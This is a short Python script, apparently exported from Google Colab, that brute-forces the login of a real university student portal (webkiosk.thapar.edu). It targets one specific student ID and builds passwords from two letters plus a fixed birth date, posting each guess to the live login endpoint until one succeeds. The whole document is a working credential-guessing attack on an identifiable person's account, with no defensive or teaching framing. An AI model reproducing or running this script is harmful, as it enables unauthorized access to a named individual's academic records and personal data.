# -*- coding: utf-8 -*-
"""Untitled

Automatically generated by Colab.

Original file is located at
    https://colab.research.google.com/drive/175sHqe0pvdLp0jJxOlZSCGVNu0ylRqU0
"""

import requests
import sys
import itertools

login_url = "https://webkiosk.thapar.edu/CommonFiles/UserAction.jsp"
success_url = "https://webkiosk.thapar.edu/StudentFiles/StudentPage.jsp"
failure_url = "https://webkiosk.thapar.edu/index.jsp"

# Replace these with your actual username and password
username = "102216123"

# Generate alphabetic combinations (A-Z)
alphabets = [chr(i) for i in range(ord('A'), ord('Z') + 1)]

# Fixed date: 12th September 2003
date = "12092003"

# Loop over alphabetic combinations
password_combinations = itertools.product(alphabets, repeat=2)
for alphabetic_combination in password_combinations:
    password = f"{alphabetic_combination[0]}{alphabetic_combination[1]}{date}"
    print("Trying password:", password)

    payload = {
        "UserType": "P",
        "MemberCode": username,
        "Password": password,
        "BTNSubmit": "Submit",  # Name of the submit button
        "BTNReset": "Reset"  # Name of the reset button
    }

    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
    }

    with requests.Session() as session:
        try:
            response = session.post(login_url, data=payload, headers=headers)
            response.raise_for_status()
        except requests.exceptions.RequestException as e:
            print(f"Error during request: {e}")
            sys.exit(1)

        if response.url == success_url:
            print("Login SUCCESS")
            # You can now continue making requests within the session
            # For example, you can fetch data from the successful login page.
            break  # Exit the loop when login is successful
        elif response.url == failure_url:
            print("Login FAILED")
        else:
            print("Unexpected response page:", response.url)



